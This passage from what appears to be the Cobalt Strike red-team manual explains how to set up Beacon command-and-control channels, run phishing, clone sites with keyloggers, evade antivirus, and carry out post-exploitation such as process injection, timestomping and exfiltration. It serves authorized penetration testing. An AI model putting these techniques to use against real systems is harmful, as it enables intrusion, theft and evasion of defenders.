<td>windows/foreign/reverse_dns_txt</td>
<td>yes</td>
<td>no</td>
<td></td>
</tr>
<tr>
<td>windows/foreign/reverse_http</td>
<td>yes</td>
<td>no</td>
<td></td>
</tr>
<tr>
<td>windows/foreign/reverse_https</td>
<td>yes</td>
<td>no</td>
<td></td>
</tr>
<tr>
<td>windows/foreign/reverse_tcp</td>
<td>yes</td>
<td>no</td>
<td></td>
</tr>
</tbody>
</table>
5. Beacon Payload Setup

5.1 Cobalt Strike’s Beacon Payload
Beacon is Cobalt Strike’s payload to model advanced attackers. Use Beacon to egress a network over HTTP, HTTPS, or DNS. You may also limit which hosts egress a network by controlling peer-to-peer Beacons over Windows named pipes.

Beacon is flexible and supports asynchronous and interactive communication. Asynchronous communication is low and slow. Beacon will phone home, download its tasks, and go to sleep. Interactive communication happens in real-time.

Beacon’s network indicators are malleable. Redefine Beacon’s communication with Cobalt Strike’s malleable C2 language. This allows you to cloak Beacon activity to look like other malware or blend-in as legitimate traffic.

5.2 HTTP Beacon
windows/beacon_http/reverse_http is Cobalt Strike’s HTTP beacon. This beacon will check for tasks and download them with an HTTP GET request. This beacon sends data back with an HTTP POST request. Once you create listener and press Save, Cobalt Strike will ask you to provide a list of domains to beacon to. Create DNS A records that point to your team server’s IP address or its redirectors. If you do not control any domains (shame on you!), provide your team server’s IP address in this box.

![Configure Beacon Domains](image)

Figure 20. Configure Beacon Domains

windows/beacon_https/reverse_https is Cobalt Strike’s HTTPS Beacon. This variant of Beacon will SSL encrypt its communications.

Manual Proxy Settings
The HTTP and HTTPS Beacon use the same proxy settings as Internet Explorer. If Beacon is run from a user context, Beacon’s HTTP and HTTPS communication will automatically authenticate itself to a proxy server. Sometimes, these defaults are not desirable.
It's possible to export a stageless Beacon artifact with an alternate proxy configuration. Go to **Attacks -> Packages -> Windows Executable (S)**. Press the ... button next to the Proxy field. This will open a dialog to change the proxy settings for a Beacon artifact.

The **(Manual) Proxy Settings** dialog offers several options to change how Beacon makes its HTTP and HTTPS requests. The Type field configures the type of proxy. The Host and Port fields tell Beacon where the proxy lives. The Username and Password fields are optional. These fields specify the credentials Beacon uses to authenticate to the proxy.

Check the **Ignore proxy settings; use direct connection** box to force Beacon to attempt its HTTP and HTTPS requests without going through a proxy.

Press **Set** to update the Beacon dialog with the desired proxy settings. Press **Reset** to set the proxy configuration back to the default behavior.

There is no option to specify manual proxy settings with a Beacon listener itself. This is because the Beacon HTTP and HTTPS stagers do not support these options.

### 5.3 Hybrid HTTP and DNS Beacon

The Hybrid HTTP and DNS Beacon payload is a favorite Cobalt Strike feature. This payload uses DNS requests to beacon back to you. These DNS requests are lookups against domains that your Cobalt Strike team server is authoritative for. The DNS response tells Beacon to go to sleep or to connect to you to download tasks. The DNS response will also tell the Beacon how to download tasks from your team server.
Originally, this payload would download all of its tasks via an HTTP GET connection. The purpose of the DNS beaconing was to minimize the payload’s need to connect directly to you. Over time, it became obvious that there were situations where it would be nice to download tasks over DNS as well.

Today, the Hybrid HTTP and DNS Beacon can download tasks over HTTP, DNS A records, DNS AAAA records, or DNS TXT records. Better, this payload has the flexibility to change between these data channels while its on target. Use Beacon’s mode command to change the current Beacon’s data channel. `mode http` is the HTTP data channel. `mode dns` is the DNS A record data channel. `mode dns6` is the DNS AAAA record channel. And, `mode dns-txt` is the DNS TXT record data channel.

The HTTP data channel uses HTTP POST requests to send information back to you. The DNS data channels embed data destined for your team server into a long hostname. The maximum length of this hostname is set by the Malleable C2 maxdns option. The DNS TXT channel will use 100% of this value. The DNS AAAA channel will use 50% of this value. The DNS A channel will use 25% of this value.

Be aware that DNS Beacon does not check in until there’s a task available. Use the `checkin` command to request that the DNS Beacon check in next time it calls home.

**Listener Setup**

The `windows/beacon_dns/reverse_http` payload stages over an HTTP connection. When you create this listener, be aware that you’re configuring the host and port Cobalt Strike will use to stage this payload over HTTP. Cobalt Strike knows to stand up a DNS server on port 53 when you choose to setup this payload.
The `windows/beacon_dns/reverse_dns_txt` payload uses DNS TXT records to download and stage the Hybrid HTTP and DNS Beacon. When you create this listener, be aware that you’re configuring which port this payload will use for HTTP communication. Again, Cobalt Strike knows to stand up a DNS server on port 53.

If you setup the Hybrid HTTP and DNS Beacon payload with the HTTP stager, be aware that you can still request the DNS TXT record stager too. Many Cobalt Strike features will let you specify the listener name (DNS) to force the use of the DNS TXT record stager.

**DNS Beaconing Domains**

Once you create a listener and press **Save**, Cobalt Strike will ask you to provide a list of domains to beacon to. Your Cobalt Strike team server system must be authoritative for the domains you specify. Create a DNS A record and point it to your Cobalt Strike team server. Use DNS NS records to delegate several domains or sub-domains to your Cobalt Strike team server’s A record.

![Figure 23. Configure DNS Beacon Domains](image)

To test your DNS configuration, open a terminal and type **nslookup jibberish.beacon domain**. If you get an A record reply of 0.0.0.0—then your DNS is correctly setup. If you do not get a reply, then your DNS configuration is not correct and the Hybrid HTTP and DNS Beacon will not communicate with you.

Make sure your DNS records reference the primary address on your network interface. Cobalt Strike’s DNS server will always send responses from your network interface’s primary address. DNS resolvers tend to drop replies when they request information from one server, but receive a reply from another.

If you are behind a NAT device, make sure that you use your public IP address for the NS record and set your firewall to forward UDP traffic on port 53 to your system. Cobalt Strike includes a DNS server to control Beacon.

**5.4 SMB Beacon**

`windows/beacon_smb/bind_pipe` is Cobalt Strike’s SMB Beacon. The SMB Beacon uses named pipes to communicate through a parent Beacon. This peer-to-peer communication
works with Beacons on the same host. It also works across the network. Windows encapsulates named pipe communication within the SMB protocol. Hence, the name, SMB Beacon.

You may use the SMB Beacon as a target listener for most of Beacon’s features. The features that affect the local host will stage over a TCP connection that’s setup to avoid the ire of the local host-based firewall. Beacon’s lateral movement features will stage the SMB Beacon over a named pipe.

You may also export a stageless SMB Beacon executable or DLL. Go to **Attacks -> Packages -> Windows Executable (S)** and select your SMB Beacon listener.

Actions that stage the SMB Beacon will automatically link to it. If you run a stageless SMB Beacon payload, you must link to the payload to assume control of it.

An HTTP or DNS Beacon may become an SMB Beacon. Use **mode smb** to make this change happen. Once a Beacon becomes an SMB Beacon, there is no way to make it beacon over HTTP or DNS again. If you’d like to kill an SMB Beacon, use the **exit** command. If you’d like to make the host beacon over HTTP or DNS, task the SMB Beacon to give you another Beacon session.

**Linking and Unlinking**
From the Beacon console, use **link [ip address]** to link the current Beacon to an SMB Beacon that is waiting for a connection. When the current Beacon checks in, its linked peers will check in too.

To blend in with normal traffic, linked Beacons use Windows named pipes to communicate. This traffic is encapsulated in the SMB protocol. There are a few caveats to this approach:

1. Hosts with an SMB Beacon must accept connections on port 445.
2. You may only link Beacons managed by the same Cobalt Strike instance.

If you get an error 5 (access denied) after you try to link to a Beacon: steal a domain user’s token or use **shell net use \host\IPC$ /U:DOMAIN\user password** to establish a session with the host. An administrator user is not required for this. Any valid domain user will do. Once you have a session, try to link to the Beacon again.

To destroy a Beacon link use **unlink [ip address]** in the parent or child. Later, you may link to the unlinked Beacon again (or link to it from another Beacon).

**5.5 Payload Security Features**
Cobalt Strike takes steps to protect Beacons communication and to ensure that a Beacon can only receive tasks from and send output to its team server.

When you setup the Beacon payload for the first time, Cobalt Strike will generate a public/private key pair that is unique to your team server. The team server's public key is
embedded into Beacon’s payload stage. Beacon uses the team server’s public key to encrypt session metadata that it sends to the team server.

Beacon must always send session metadata before the team server can issue tasks and receive output from the Beacon session. This metadata contains a random session key generated by that Beacon. The team server uses each Beacon’s session key to encrypt tasks and to decrypt output.

Each Beacon implementation and data channel uses this same scheme. You have the same security with the A record data channel in the Hybrid HTTP and DNS Beacon as you do with the HTTPS Beacon.

Be aware that the above applies to Beacon once it is staged. The payload stagers, due to their size, do not have built-in security features.
6. Getting a Foothold

6.1 Client-side System Profiler
The system profiler is a reconnaissance tool for client-side attacks. This tool starts a local web-server and fingerprints any one who visits it. The system profiler provides a list of applications and plugins it discovers through the user’s browser. The system profiler also attempts to discover the internal IP address of users who are behind a proxy server.

To start the system profiler, go to **Attacks -> Web Drive-by -> System Profiler**. To start the profiler you must specify a URI to bind to and a port to start the Cobalt Strike web-server from.

If you specify a *Redirect URL*, Cobalt Strike will redirect visitors to this URL once their profile is taken. Click **Launch** to start the system profiler.

The System Profiler uses an unsigned Java Applet to decloak the target’s internal IP address and determine which version of Java the target has. With Java’s click-to-run security feature—this could raise suspicion. Uncheck the Use *Java Applet to get information* box to remove the Java Applet from the System Profiler.

To view the results from the system profiler, go to **View -> Applications**. Cobalt Strike will list all of the applications it discovered during the system profiling process.

6.2 Cobalt Strike Web Services
Many Cobalt Strike features run from their own web server. These services include the system profiler, HTTP Beacon, and Cobalt Strike’s web drive-by attacks. It’s OK to host multiple Cobalt Strike features on one web server.

To manage Cobalt Strike’s web services, go to **View -> Web Drive-by -> Manage**. Here, you may copy any Cobalt Strike URL to the clipboard or stop a Cobalt Strike web service.

Use **View -> Web Log** to monitor visits to your Cobalt Strike web services.

If Cobalt Strike’s web server sees a request from the Lynx, Wget, or Curl browser; Cobalt Strike will automatically return a 404 page. Cobalt Strike does this as light protection against blue team snooping.

6.3 User-driven Attack Packages
The best attacks are not exploits. Rather, the best attacks take advantage of normal features to get code execution. Cobalt Strike makes it easy to setup several user-driven attacks. These attacks take advantage of listeners you’ve already setup. Navigate to **Attacks -> Packages** and choose one of the following options.
HTML Application
An HTML Application is a Windows program written in HTML and an Internet Explorer-supported scripting language. This package generates an HTML Application that runs a Cobalt Strike payload. You may choose the Executable option to get an HTML Application that drops an executable to disk and runs it. Choose the PowerShell option to get an HTML Application that uses PowerShell to run a payload. Use the VBA option to silently spawn a Microsoft Excel instance and run a malicious macro that injects a payload into memory.

MS Office Macro
This package generates a Microsoft Office macro and presents instructions to embed the macro in Microsoft Word or Microsoft Excel.

Payload Generator
This package allows you to export Cobalt Strike’s stagers in a variety of formats.

USB/CD AutoPlay
This package generates an autorun.inf file to abuse the Windows AutoPlay feature. Use this package to turn a USB stick or CD into an attack vector against Windows XP and Windows Vista. This attack is old, so old it doesn’t deserve to be included in Cobalt Strike, but many people ask for it. That’s why it’s here.

Windows Dropper
This package creates a Windows executable that drops an arbitrary file to disk and opens it—while silently executing a payload. This is a popular social engineering attack.

Windows Executable
This package generates a Windows executable artifact that delivers a listener. This package gives you several output options.

Windows EXE is a Windows executable.

Windows Service EXE is a Windows executable that responds to Service Control Manager commands. You may use this executable to create a Windows service with sc or as a custom executable with the Metasploit Framework’s PsExec modules.

Windows DLL (32-bit) is an x86 Windows DLL.

Windows DLL (64-bit) is an x64 Windows DLL. This DLL will spawn a 32-bit process and migrate your listener to it. Both DLL options export a Start function that is compatible with rundll32.exe. Use rundll32.exe to load your DLL from the command line.

    rundll32 foo.dll,Start

Check the Use x64 payload box to generate x64 artifacts that pair with an x64 stager.

Check the Sign executable file box to sign an EXE or DLL artifact with a code-signing certificate. You must specify a certificate in a Malleable C2 profile.
Windows Executable (S)
This package exports Beacon, without a stager, as an executable, service executable, 32-bit DLL, or 64-bit DLL. A payload artifact that does not use a stager is called a stageless artifact. This package also has a PowerShell option to export Beacon as a PowerShell script and a raw option to export Beacon as a blob of position independent code.

By default, this dialog exports x86 payload stages. Check the Use x64 payload box to generate an x64 stage with an x64 artifact.

Check the Sign executable file box to sign an EXE or DLL artifact with a code-signing certificate.

6.4 Hosting Files
Cobalt Strike’s web server can host your user-driven packages for you. Go to Attacks -> Web Drive-by -> Host File to set this up. Choose the file to host, select an arbitrary URL, and choose the mime type for the file.

By itself, the capability to host a file isn’t very impressive. However, in a moment, you will learn how to embed Cobalt Strike URLs into a spear phishing email. When you do this, Cobalt Strike can cross-reference visitors to your file with sent emails and include this information in the social engineering report.

6.5 User-driven Web Drive-by Attacks
Cobalt Strike makes several tools to setup web drive-by attacks available to you. To quickly start an attack, go to Attacks -> Web Drive-by and choose an option:

Java Signed Applet Attack
This attack starts a web server hosting a self-signed Java applet. Visitors are asked to give the applet permission to run. When a visitor grants this permission, you gain access to their system.

The Java Signed Applet Attack uses Cobalt Strike’s Java injector. On Windows, the Java injector will inject shellcode for a Windows listener directly into memory for you.

To get the most mileage from this attack, you will want to download the Applet Kit from the Cobalt Strike arsenal and sign it with a code signing certificate.

Java Smart Applet Attack
Cobalt Strike’s Smart Applet Attack combines several exploits to disable the Java security sandbox into one package. This attack starts a web server hosting a Java applet. Initially, this applet runs in Java’s security sandbox and it does not require user approval to start.

The applet analyzes its environment and decides which Java exploit to use. If the Java version is vulnerable, the applet will disable the security sandbox, and execute a payload using Cobalt Strike’s Java injector.
**Scripted Web Delivery**

This feature generates an artifact that starts Beacon, hosts it on Cobalt Strike’s web server, and presents a one-liner to download and run the artifact. The options are: bitsadmin, powershell, python, and regsvr32.

The bitsadmin option hosts an executable and uses bitsadmin to download it. The bitsadmin method runs the executable via cmd.exe. The powershell option hosts a PowerShell script and uses powershell.exe to download the script and evaluate it. The python option hosts a Python script and uses python.exe to download the script and run it. The regsvr32 option generates a COM Scriptlet file and uses regsvr32.exe to download and run the scriptlet’s contents. The COM Scriptlet gets Beacon into memory using a malicious VBA macro. The COM Scriptlet option requires Microsoft Office on the target. Each of these options is a different way to run a Cobalt Strike listener.

**6.6 Client-side Exploits**

You may use a Metasploit Framework exploit to deliver a Cobalt Strike Beacon. Cobalt Strike’s Beacon is compatible with the Metasploit Framework's staging protocol. To deliver a Beacon with a Metasploit Framework exploit:

- Use `windows/meterpreter/reverse_http` as your PAYLOAD and set LHOST and LPORT to point to your Cobalt Strike listener. You’re not really delivering Meterpreter here, you’re telling the Metasploit Framework to generate the HTTP stager that downloads a payload from the specified LHOST/LPORT.
- Set `DisablePayloadHandler` to `True`. This will tell the Metasploit Framework to avoid standing up a handler within the Metasploit Framework to service your payload connection.
- Set `PrependMigrate` to `True`. This option tells the Metasploit Framework to prepend shellcode that runs the payload stager in another process. This helps your Beacon session survives if the exploited application crashes or if it’s closed by a user.

Here’s a screenshot of msfconsole used to stand up a Flash Exploit to deliver Cobalt Strike’s HTTP Beacon hosted at 192.168.1.5 on port 80:
6.7 Clone a Site

Before sending an exploit to a target, it helps to dress it up. Cobalt Strike’s website clone tool can help with this. The website clone tool makes a local copy of a website with some code added to fix links and images so they work as expected.

To clone a website, go to **Attacks -> Web Drive-by -> Clone Site.**

It’s possible to embed an attack into a cloned site. Write the URL of your attack in the Embed field and Cobalt Strike will add it to the cloned site with an IFRAME. Click the button to select one of the running client-side exploits.
Cloned websites can also capture keystrokes. Check the *Log keystrokes on cloned site* box. This will insert a JavaScript key logger into the cloned site.

To view logged keystrokes or see visitors to your cloned site, go to **View -> Web Log**.

### 6.8 Spear Phishing

#### Targets

Now that you have an understanding of client-side attacks, let’s talk about how to get the attack to the user. The most common way into an organization’s network is through spear phishing.

Before you send a phishing message, you should assemble a list of targets. Cobalt Strike expects targets in a text file. Each line of the file contains one target. The target may be an email address. You may also use an email address, a tab, and a name. If provided, a name helps Cobalt Strike customize each phish.

#### Templates

Next, you need a phishing template. The nice thing about templates is that you may reuse them between engagements. Cobalt Strike uses saved email messages as its templates. Cobalt Strike will strip attachments, deal with encoding issues, and rewrite each template for each phishing attack.

If you’d like to create a custom template, compose a message and send it to yourself. Most email clients have a way to get the original message source. In Gmail, click the down arrow next to **Reply** and select **Show original**. Save this message to a file and then congratulate yourself—you’ve made your first Cobalt Strike phishing template.

You may want to customize your template with Cobalt Strike's tokens. Cobalt Strike replaces the following tokens in your templates:

<table>
<thead>
<tr>
<th>Token</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>%To%</td>
<td>The email address of the person the message is sent to</td>
</tr>
<tr>
<td>%To_Name%</td>
<td>The name of the person the message is sent to.</td>
</tr>
<tr>
<td>%URL%</td>
<td>The contents of the Embed URL field in the spear phishing dialog.</td>
</tr>
</tbody>
</table>

#### Sending Messages

Now that you have your targets and a template, you're ready to go phishing. To start the spear phishing tool, go to **Attacks -> Spear Phish**.
Figure 26. Spear Phishing Tool

To send a phishing message, you must first import your targets. Click the folder next to the Targets field to import your targets file.

Next, choose your template file. Click on the folder next to the Template field to choose one.

Now, you have the option to attach a file if you choose. This is a great time to use one of the social engineering packages discussed earlier. Cobalt Strike will add your attachment to the outgoing phishing message.

You may also ask Cobalt Strike to rewrite all URLs in the template with a URL of your choosing. Paste in the URL or press ... to choose one of the tools hosted by Cobalt Strike. Cobalt Strike tools include cloned websites, the auto-exploit server, and the system profiler.

When you embed a URL, Cobalt Strike will attach ?id=%TOKEN% to it. Each sent message will get its own token. Cobalt Strike uses this token to map website visitors to sent emails. If you care about reporting, be sure to keep this value in place.

Set Mail Server to an open relay or the mail exchange record for your target. If necessary, you may also authenticate to a mail server to send your phishing messages.

Press ... next to the Mail Server field to configure additional server options. You may specify a username and password to authenticate with. The Random Delay option tells Cobalt Strike to randomly delay each message by a random time, up to the number of seconds you specify. If this option is not set, Cobalt Strike will not delay its messages.
Set Bounce To to an email address where bounced messages should go. This value will not affect the message your targets see. Press Preview to see an assembled message to one of your recipients. If the preview looks good, press Send to deliver your attack.

Cobalt Strike sends phishing messages through the team server.
7. Anti-virus Evasion

7.1 Philosophy
Strategic Cyber LLC regularly fields questions that ask about evasion. Does Cobalt Strike bypass anti-virus products? Which anti-virus products does it bypass? How often is this checked?

Cobalt Strike does not guarantee evasion in any given situation. This is impossible to guarantee. Evasion is a cat and mouse game. As the operator, you must assess the current situation and make a decision about the best solution to use at that time.

Cobalt Strike’s does offer flexibility. You, the operator, may change the executables, DLLs, applets, and script templates Cobalt Strike uses in its workflows. You may also export Cobalt Strike’s Beacon payload in a variety of formats that work with third-party tools designed to assist with evasion.

This chapter will highlight the Cobalt Strike features that provide this flexibility.

7.2 The Artifact Kit
Cobalt Strike uses the Artifact Kit to generate its executables and DLLs. The Artifact Kit is a source code framework to build executables and DLLs that evade some anti-virus products.

The Theory of the Artifact Kit
Traditional anti-virus products use signatures to identify known bad. If we embed our known bad shellcode into an executable, an anti-virus product will recognize the shellcode and flag the executable as malicious.

To defeat this detection, it’s common for an attacker to obfuscate the shellcode in some way and place it in the binary. This obfuscation process defeats anti-virus products that use a simple string search to identify malicious code.

Many anti-virus products go a step further. These anti-virus products simulate execution of an executable in a virtual sandbox. With each emulated step of execution, the anti-virus product checks for known bad in the emulated process space. If known bad shows up, the anti-virus product flags the executable or DLL as malicious. This technique defeats many encoders and packers that try to hide known bad from signature-based anti-virus products.

Cobalt Strike’s counter to this is simple. The anti-virus sandbox has limitations. It is not a complete virtual machine. There are system behaviors the anti-virus sandbox does not emulate. The Artifact Kit is a collection of executable and DLL templates that rely on some behavior that anti-virus product’s do not emulate to recover shellcode located inside of the binary.
One of the techniques [see: src-common/bypass-pipe.c in the Artifact Kit] generates executables and DLLs that serve shellcode to themselves over a named pipe. If an anti-virus sandbox does not emulate named pipes, it will not find the known bad shellcode.

**Where Artifact Kit Fails**

Of course it’s possible for anti-virus products to defeat specific implementations of the Artifact Kit. If an anti-virus vendor writes signatures for the Artifact Kit technique you use, then the executables and DLLs it creates will get caught. This started to happen, over time, with the default bypass technique in Cobalt Strike 2.5 and below. If you want to get the most from the Artifact Kit, you will use one of its techniques as a base to build your own Artifact Kit implementation.

Even that isn’t enough though. Some anti-virus products call home to the anti-virus vendor’s servers. There the vendor makes a determination if the executable or DLL is known good or an unknown, never before seen, executable or DLL. Some of these products automatically send unknown executables and DLLs to the vendor for further analysis and warn the users. Others treat unknown executables and DLLs as malicious. It depends on the product and its settings.

The point: no amount of “obfuscation” is going to help you in this situation. You’re up against a different kind of defense and will need to work around it accordingly. Treat these situations the same way you would treat application whitelisting. Try to find a known good program (e.g., powershell) that will get your payload stager into memory.

**How to use the Artifact Kit**

Go to Help -> Arsenal from a licensed Cobalt Strike to download the Artifact Kit.

Strategic Cyber LLC distributes the Artifact Kit as a .tgz file. Use the tar command to extract it. The Artifact Kit includes a build.sh script. Run this script on Kali Linux, with no arguments, to build the default Artifact Kit techniques with the Minimal GNU for Windows Cross Compiler.

```
root@kali:~/artifact# ls
build.sh  dist-pipe  dist-template  script.example  src-main
dist-peek  dist-readfile  README.txt  src-common

root@kali:~/artifact# ./build.sh
[+] You have a x86_64 mingw--I will recompile the artifacts
[*] Recompile artifact32.dll with src-common/bypass-pipe.c
Warning: resolving _DllGetClassObject by linking to _DllGetClassObject@12
Use --enable-stdcall-fixup to disable these warnings
Use --disable-stdcall-fixup to disable these fixups
```

**Figure 28. The Artifact Kit Build Process**

The Artifact Kit build script creates a folder with template artifacts for each Artifact Kit technique. To use a technique with Cobalt Strike, go to Cobalt Strike -> Script Manager, and load the artifact.cna script from that technique’s folder.
You’re encouraged to modify the Artifact Kit and its techniques to make it meet your needs. While skilled C programmers can do more with the Artifact Kit, it’s quite feasible for an adventurous non-programmer to work with the Artifact Kit too. For example, a major anti-virus product likes to write signatures for the executables in Cobalt Strike’s trial each time there is a release. Up until Cobalt Strike 2.5, the trial and licensed versions of Cobalt Strike used the named pipe technique in its executables and DLLs. This vendor would write a signature for the named pipe string the executable used. Defeating their signatures, release after release, was as simple as changing the name of the pipe in the pipe technique’s source code.

7.3 The Veil Evasion Framework
Veil is a popular framework to generate executables that get past some anti-virus products. You may use Veil to generate executables for Cobalt Strike’s payloads. Go to Attacks -> Packages -> Payload Generator. Choose the listener you want to generate an executable for. Select Veil as the Output type. Press Generate and save the file.

Launch the Veil Evasion Framework and choose the technique you want to use. Veil will eventually ask about shellcode. Select Veil’s option to supply custom shellcode. Paste in the contents of the file Cobalt Strike’s payload generator made. Press enter and you will have a fresh Veil-made executable.

![Veil-Evasion | [Version]: 2.10.1][1]

Figure 29. Using Veil to Generate an Executable

7.4 Java Applet Attacks
Strategic Cyber LLC distributes the source code to Cobalt Strike’s Applet Attacks as the Applet Kit. This is also available within the Cobalt Strike arsenal. Go to Help -> Arsenal and download the Applet Kit.

Use the included build.sh script to build the Applet Kit on Kali Linux. Many Cobalt Strike customers use this flexibility to sign Cobalt Strike’s Java Applet attacks with a code-signing certificate that they purchased. This is highly recommended.
To make Cobalt Strike use your Applet Kit over the built-in one, load the applet.cna script included with the Applet Kit.

On the Cobalt Strike Arsenal Page you will also notice the Power Applet. This is an alternate implementation of Cobalt Strike’s Java Applet attacks that uses PowerShell to get a payload into memory. The Power Applet demonstrates the flexibility you have to recreate Cobalt Strike’s standard attacks in a completely different way and still use them with Cobalt Strike’s workflows.

To make Cobalt Strike use your Applet Kit over the built-in one, load the applet.cna script included with the Applet Kit.

7.5 The Resource Kit
The Resource Kit is Cobalt Strike’s means to change the PowerShell, Python, and VBA script templates Cobalt Strike uses in its workflows. Again, the Resource Kit is available to licensed users in the Cobalt Strike arsenal. Go to Help -> Arsenal to download the Resource Kit.

The README.txt included with the Resource Kit documents the included scripts and which features use them. To evade a product, consider changing strings or behaviors in these scripts.

To make Cobalt Strike use your script templates over the built-in script templates, load the resources.cna script included with the Resource Kit.
8. Post Exploitation

8.1 The Beacon Console

Right-click on a Beacon session and select interact to open that Beacon’s console. The console is the main user interface for your Beacon session. The Beacon console allows you to see which tasks were issued to a Beacon and to see when it downloads them. The Beacon console is also where command output and other information will appear.

![Beacon Console Example](image)

**Figure 30. Cobalt Strike Beacon Console**

In between the Beacon console's input and output is a status bar. This status bar contains information about the current session. In its default configuration, the statusbar shows the target’s NetBIOS name, the username and PID of the current session, and the Beacon's last check-in time.

Each command that's issued to a Beacon, whether through the GUI or the console, will show up in this window. If a teammate issues a command, Cobalt Strike will pre-fix the command with their handle.

You will likely spend most of your time with Cobalt Strike in the Beacon console. It’s worth your time to become familiar with its commands. Type `help` in the Beacon console to see available commands. Type `help` followed by a command name to get detailed help.

8.2 The Beacon Menu

Right-click on a Beacon or inside of a Beacon’s console to access the Beacon menu. This is the same menu used to open the Beacon console. The Access menu contains options to manipulate trust material and elevate your access. The Explore menu consists of options to extract information and interact with the target’s system. The Pivoting menu is where you can setup tools to tunnel traffic through a Beacon. The Session menu is where you manage the current Beacon session.
Some of Cobalt Strike’s visualizations (the pivot graph and sessions table) let you select multiple Beacons at one time. Most actions that happen through this menu will apply to all selected Beacon sessions.

**8.3 Asynchronous and Interactive Operations**

Be aware that Beacon is an asynchronous payload. Commands do not execute right away. Each command goes into a queue. When the Beacon checks in (connects to you), it will download these commands and execute them one by one. At this time, Beacon will also report any output it has for you. If you make a mistake, use the `clear` command to clear the command queue for the current Beacon.

By default, Beacons check in every sixty seconds. You may change this with Beacon’s `sleep` command. Use sleep followed by a time in seconds to specify how often Beacon should check in. You may also specify a second number between 0 and 99. This number is a jitter factor. Beacon will vary each of its check in times by the random percentage you specify as a jitter factor. For example, `sleep 300 20`, will force Beacon to sleep for 300 seconds with a 20% jitter percentage. This means, Beacon will sleep for a random value between 240s to 300s after each check-in.

To make a Beacon check in multiple times each second, try `sleep 0`. This is interactive mode. In this mode commands will execute right away. You must make your Beacon interactive before you tunnel traffic through it. A few Beacon commands (e.g., `browserpivot`, `desktop`, etc.) will automatically put Beacon into interactive mode at the next check in.

**8.4 Running Commands**

Beacon’s `shell` command will task a Beacon to execute a command via cmd.exe on the compromised host. When the command completes, Beacon will present the output to you. Use the `execute` command to execute a command without cmd.exe and without posting output to you.
Use the **powershell** command to execute a command with PowerShell on the compromised host. Use the **powerpick** command to execute PowerShell cmdlets without powershell.exe. This command relies on the Unmanaged PowerShell technique developed by Lee Christensen. The powershell command will use your current token. The powerpick command does not inherit your current token. The **psinject** command will inject Unmanaged PowerShell into a specific process and run your cmdlet from that location.

The **powershell-import** command will import a PowerShell script into Beacon. Future uses of the powershell, powerpick, and psinject commands will have cmdlets from the imported script available to them. Beacon will only hold one PowerShell script at a time.

If you want Beacon to execute commands from a specific directory, use the **cd** command in the Beacon console to switch the working directory of the Beacon’s process. The **pwd** command will tell you which directory you’re currently working from.

### 8.5 Session Passing
Cobalt Strike’s Beacon started out as a stable lifeline to keep access to a compromised host. From day one, Beacon’s primary purpose was to pass accesses to other Cobalt Strike listeners.

Use the **spawn** command to spawn a session for a listener. The spawn command accepts an architecture (e.g., x86, x64) and a listener as its arguments.

By default, the **spawn** command will spawn a session in rundll32.exe. An alert administrator may find it strange that rundll32.exe is periodically making connections to the internet. Find a better program (e.g., Internet Explorer) and use the **spawnto** command to state which program Beacon should spawn for its sessions.

The **spawnto** command requires you to specify an architecture and a full path to a program to spawn, as needed. Type **spawnto** by itself and press enter to instruct Beacon to go back to its default behavior.

Type **inject** followed by a process id and a listener name to inject a session into a specific process. Use **ps** to get a list of processes on the current system. Use **inject [pid] x64** to inject a 64-bit Beacon into an x64 process.

The inject and spawn commands both inject a stager for the desired listener into memory. This stager tries to connect to its configured host to stage the requested. If the stager cannot get past any egress restrictions or blocks that are in place, you will not get a session.

Use **dllinject [pid]** to inject a Reflective DLL into a process. Use the **shinject [pid] [architecture] [/path/to/file.bin]** command to inject shellcode, from a local file, into a process on target. Use **shspawn [architecture] [/path/to/file.bin]** to spawn the “spawn to” process and inject the specified shellcode file into that process.
8.6 Alternate Parent Processes
Use `ppid [pid]` to assign an alternate parent process for programs run by your Beacon session. This is a means to make your activity blend in with normal actions on the target. The current Beacon session must have rights to the alternate parent and it’s best if the alternate parent process exists in the same desktop session as your Beacon. Type `ppid`, with no arguments, to have Beacon launch processes with no spoofed parent.

The `runu` command will execute a command with another process as the parent. This command will run with the rights and desktop session of its alternate parent process. The current Beacon session must have full rights to the alternate parent. It’s OK if the alternate parent lives in another desktop session. The `spawnu` command builds on `runu` to spawn a session (via `powershell.exe`) with another process as the parent. These commands are a way to move between desktop sessions without remote process injection.

8.7 Upload and Download Files
The `download` command will download the requested file. You do not need to provide quotes around a filename with spaces in it. Beacon is built for low and slow exfiltration of data. During each check-in, Beacon will download a fixed chunk of each file its tasked to get. The size of this chunk depends on Beacon’s current data channel. The HTTP and HTTPS channels pull data in 512KB chunks.

Type `downloads` to see a list of file downloads in progress for the current Beacon. Use the `cancel` command, followed by a filename, to cancel a download that’s in progress. You may use wildcards with your cancel command to cancel multiple file downloads at once.

Go to View -> Downloads in Cobalt Strike to see the files that your team has downloaded so far. Only completed downloads will show up in this tab. Downloaded files are stored on the team server. To bring files back to your system, highlight them here, and press Sync Files. Cobalt Strike will then download the selected files to a folder of your choosing on your system.

The `upload` command will upload a file to the host.

When you upload a file, you will sometimes want to update its timestamps to make it blend in with other files in the same folder. Use the `timestomp` command to do this. The timestomp command will match the Modified, Accessed, and Created times of one file to another file.

8.8 File Browser
Beacon’s File Browser is an opportunity to explore the files on a compromised system. Go to [Beacon] -> Explore -> File Browser to open it.
Figure 32. File Browser

Right-click a file to download or delete it.

To go up a folder, press the folder button next to the file path in the upper left-hand corner. To see which drives are available, press **List Drives**.

Be aware that each action in the file browser creates a task for Beacon to execute. The file browser cannot refresh its contents with information you request until the Beacon checks in next. If your Beacon is on a high sleep interval, your use of the file browser will not be pleasant. It’s recommended that you use the file browser with a low Beacon sleep time (e.g., less than 10 seconds).

8.9 File System Commands
You may prefer to browse and manipulate the file system from the Beacon console. You can do this too. Use the `ls` command to list files in the current directory. Use `mkdir` to make a directory. `rm` will remove a file or folder. `cp` copies a file to a destination. `mv` moves a file.

8.10 Keystrokes and Screenshots
Beacon’s tools to log keystrokes and take screenshots are designed to inject into another process and report their results to your Beacon.

To start the keystroke logger, use `keylogger pid` to inject into an x86 process. Use `keylogger pid x64` to inject into an x64 process. `explorer.exe` is a good candidate for this tool. The keystroke logger will monitor keystrokes from the injected process and report them to Beacon until the process terminates or you kill the keystroke logger post-exploitation job.

Be aware that multiple keystroke loggers may conflict with each other. Use only one keystroke logger per desktop session.

To take a screenshot, use `screenshot pid` to inject the screenshot tool into an x86 process. Use `screenshot pid x64` to inject into an x64 process. Again, `explorer.exe` is a good
